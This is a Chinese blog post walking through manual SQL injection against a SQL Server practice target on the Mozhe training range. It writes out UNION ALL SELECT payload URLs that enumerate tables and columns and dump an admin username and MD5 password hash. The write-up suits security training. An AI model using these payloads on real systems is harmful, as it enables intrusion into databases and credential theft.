1、sql server数据库进行sql注入

最新推荐文章于 2024-05-31 12:37:18 发布
最新推荐文章于 2024-05-31 12:37:18 发布
阅读量855 收藏 8
点赞数 7
分类专栏: sql注入 文章标签: sql 数据库 web安全 网络安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_51520483/article/details/138920560
版权
靶机取自:墨者sql server
1、判断数据库类型

抓包知sql server,所以注入语句跟MySQL有些区别

2、判断注入点

“http://219.153.49.228:42514/new_list.asp?id=2 ”,当id=2 and 1=1时显示正确,id=2 and 1=2时页面报错。

3、确定列数为 4
  • /new_list.asp?id=2 ORDER BY 1 成功
  • /new_list.asp?id=2 ORDER BY 2 成功
  • /new_list.asp?id=2 ORDER BY 3 失败
  • /new_list.asp?id=2 ORDER BY 4 成功
  • /new_list.asp?id=2 ORDER BY 5 失败
  • /new_list.asp?id=2 ORDER BY 6 失败
  • /new_list.asp?id=2 ORDER BY 7 失败

根据这些信息,ORDER BY 4 成功,而 ORDER BY 3 失败,这看起来很矛盾,因为一般来说,如果 ORDER BY 3 失败,ORDER BY 4 应该也会失败。

分析原因:

  1. SQL查询结构: 可能你查询的SQL语句涉及了多个表连接或者子查询,这会导致某些列存在而其他列不存在的情况。

  2. 自定义排序: 数据库的查询中可能存在自定义排序逻辑,某些列可能只在特定条件下可用。

***所以sql测试中,我们需要进行更多测试以确认列数

4、判断回显字段

这其实还要分两种情况:

1、回显的字段是字符型,还是整数型或其他

  1. 数据类型匹配

    • 数据库表中的列有特定的数据类型(如整数、字符串、日期等)。当注入的值与列的数据类型不匹配时,会导致SQL语法错误或类型错误。
    • 例如,如果某列期望一个字符串类型的数据,而你传入一个整数,数据库可能会报错。

  2. SQL查询构造

    • SQL注入构造的查询语句需要与数据库表的结构和列类型匹配。
    • 使用单引号包裹的值通常被解释为字符串类型,而不使用引号的值通常被解释为数字或列名。

2、注入成功是要在页面正常显示情况下回显字段,还是页面报错情况下才会回显字段

  • 正常页面:当提供的 id 值有效时,原始查询会返回一个正常的结果集,页面会显示该结果。如果 UNION ALL SELECT 注入成功,并且注入的列恰好在显示内容中,那么注入的结果可能会被id值结果覆盖。
  • 错误页面:当提供的 id 值无效时,原始查询失败,页面可能显示错误信息或没有结果。在这种情况下,注入的 UNION ALL SELECT 可能成为唯一的结果集,因此被显示出来。

思路

①先假设为全部字段为字符型,payload:http://219.153.49.228:46552/new_list.asp?id=2 union all select '1', '2', '3', '4' 。发现并没有回显

②id=-2时,页面报错,所以payload:http://219.153.49.228:46552/new_list.asp?id=-2 union all select '1', '2', '3', '4'。回显2、3字段

到这已经可以判断出2、3字段是字符型,并且页面有报错信息时才有回显,否则被内容覆盖

然后判断1、4字段类型,需要一个一个去除单引号,判断其回显情况

5、获取数据库信息

http://219.153.49.228:43696/new_list.asp?id=-2 union all select 1,user,db_name(),4

6、获取数据表名manage

http://219.153.49.228:43696/new_list.asp?id=-2 union all select 1,(select top 1 name from mozhe_db_v2.dbo.sysobjects where xtype='U'),'3',4

7、获取列名:id、name

http://219.153.49.228:43696/new_list.asp?id=-2 union all select 1,(select top 1 col_name(object_id('manage'),1) from sysobjects),(select top 1 col_name(object_id('manage'),2) from sysobjects),4

以此类推,获取第3个字段,第4个字段

8、查出用户名和密码

用户名:admin_mz、加密密码:72e1bfc3f01b7583

http://219.153.49.228:43696/new_list.asp?id=-2 union all select 1,(select username from manage),(select password from manage),4

9、md5解密

9、总结

1、判断数据类型是很重要的一点,影响后面的注入语句

2、确定列数时,要多测几组数据,从而分析判断列数,并不是遇到第一个报错就停止测试

3、正常网页(例如id=1,参数正确)没有注入回显时,试试报错情况(id=-1),注入回显有可能被正常返回数据覆盖

4、注入回显的字段有可能整形、字符、小数等,注意是否需要单引号

5、最好先全部统一会先字段类型,比如全部整形,挨个轮流改变为字符形

你挡我发光了
关注
  • 7
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sqlserver 数据库被注入解决方案
09-11
定义要去除的字符,请注意,肯定不止一条,我的服务器就查到许多不同的代码
SQLServer数据库注入-墨者学院(SQL手工注入漏洞测试(Sql Server数据库))
T1ngSh0w的博客
09-07 1206
SQLServer数据库注入-墨者学院-SQL手工注入漏洞测试(Sql Server数据库)详细讲解
sql注入详解
热门推荐
yy
05-05 19万+
SQL注入SQL Injection)是一种常见的Web安全漏洞,主要形成的原因是在数据交互,前端的数据传入到后台处理时,没有做严格的判断,导致其传入的“数据”拼接到SQL语句后,被当作SQL语句的一部分执行。 从而导致数据库受损(被脱库、被删除、甚至整个服务器权限陷)。 即:注入产生的原因是后台服务器接收相关参数未经过滤直接带入数据库查询...
SQL手工注入漏洞测试(Sql Server数据库)
chinacqzgp的博客
09-20 860
和mysql 注入有些不同,union select 无法使用,Sql Server数据库只能用 union all
Python操作MySQLSQL Server数据库的基础与实战
一键难忘的博客
02-25 3502
在Python,我们经常需要与各种数据库进行交互,其MySQLSQL Server是两个常见的选择。本文将介绍如何使用`pymysql`和`pymssql`库进行基本的数据库操作,并通过实际代码示例来展示这些操作。
SQLServer数据库SQL注入
Jietewang的博客
02-24 938
1. 前言 搜寻了好久发现一张非常详细的关于SQLServer注入脑图。 图片来源:https://xie1997.blog.csdn.net/article/details/88679754 2. SQLServer数据库 2.1 数据库权限介绍 SQL Server数据库是由Microsoft开发和推广的关系数据库管理系统(DBMS),是一个比较大型的数据库,默认端口:1433。数据库后缀名(.mdf),注释符(--)。 SQL Server有三个权限级别: sa权限:服务器级别,
Sql Server数据库手工注入
yy
06-13 5408
目录 Sql Server Sql Server数据库的查询语句 union注入 延时注入 这里感谢墨者学院提供的靶场:https://www.mozhe.cn/bug/detail/90 Sql Server SQL Server数据库是由Microsoft开发和推广的关系数据库管理系统(DBMS),是一个比较大型的数据库。端口号为1433。数据库后缀名 .mdf,注释符是 -- 。 QLServer有三个权限级别: sa权限:数据库操作,文件管理,命令执行,注册表读取等system。.
SqlServer基本注入
adaosanqian的博客
02-28 3627
SQLserver基本注入的基础知识理解
WinForm连接SQL server数据库
xxxiaoshu的博客
12-09 1947
这里对以上的代码进行简单的整理(除去DataReader部分)
SQL Server 数据库常见提权总结
m0_64481831的博客
03-28 1430
前面总结了linux和Windows的提权方式以及Mysql提权,这篇文章讲讲SQL Server数据库的提权。
访问SQLServer - springboot自定义DBUtil(druid连接池)操作SQLServer数据库
03-10
Spring-Boot通过druid连接池获取连接操作SQLServer数据库 总结:【共3步】 第1步:添加druid和MSSQL Driver的依赖项; 第2步:配置连接字符串; 第3步:创建数据库操作类,使用@Bean注入DruidDataSource, 然后根据...
iis网站服务器+sqlserver数据库服务器安全
02-01
server数据库服务器安全1友好的错误提示页,不出错误黄页,会暴露信息2输入参数检测,get,post,cookie验证,防注入3页面层不含任何业务逻辑4fck等编辑器有安全漏洞,慎用5.net开发除了在页面层对所有输入要防注入外...
SQL Server数据库重命名、数据导出的方法说明
01-19
第一个问题是重命名数据库问题:在企业管理器是无法直接对数据库重命名的,只能在查询分析器操作 代码如下:create proc killspid (@dbname varchar(20)) as begin declare @sql nvarchar(500),@temp ...
【PostgreSQL17新特性之-explain命令新增选项】
最新发布
小怪兽的博客
05-31 534
PostgreSQL17-beta1版本近日发布了,新版本里,explain命令新增了两个选项,分别是MEMORY 和SUMMARY。
基础—SQL—DQL(数据查询语言)聚合函数
m0_74363339的博客
05-30 223
这篇博客主要讲到了SQL分类的DQL(数据查询语言)—聚合函数的讲解,聚合函数比较简单,但它主要配合着分组查询进行数据查询的操作,注意NULL的字段值不参与聚合函数的运算......
postgressql——子事务可见性判断 & 性能问题(8)
Re_view的博客
05-31 166
postgressql——子事务可见性判断 & 性能问题(8)
PostgreSQL常用插件
PGCCC的博客
05-29 504
1.提供 PostgreSQL 实例的操作系统级别的资源使用情况,包括缓存命率和磁盘 IO 等。通过使用这些插件,您可以大大增强 PostgreSQL 的功能,满足各种复杂的应用需求。1.提供三元组(trigram)相似度匹配和索引功能,常用于模糊搜索和文本相似度匹配。1.增加对地理空间数据的支持,使 PostgreSQL 成为一个功能强大的空间数据库。1.PostgreSQL 的过程语言,允许用户编写存储过程和触发器。1.基于逻辑复制的插件,提供更细粒度的数据复制控制和双向复制能力。
postgressql——Tuple学习(2)
Re_view的博客
05-27 268
postgressql——Tuple学习(2)
PostgreSQL发展史
PGCCC的博客
05-28 917
PostgreSQL 的发展史反映了其从学术研究项目到全球领先的开源数据库系统的演变过程。通过不断的创新和社区支持,PostgreSQL 已经成为一个功能强大、性能优越的数据库管理系统,广泛应用于各个行业的关键业务场景。#postgresql培训。
sql手工注入漏洞测试(sql server数据库)
06-28
4. 输入恶意代码进行测试,如SQL注入攻击、XSS攻击等。 5. 对输入参数进行参数化处理,避免字符串拼接。 6. 对用户输入进行格式化处理,允许输入合法的字符和长度。 7. 检查SQL Server的配置选项,确保其安全设置...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值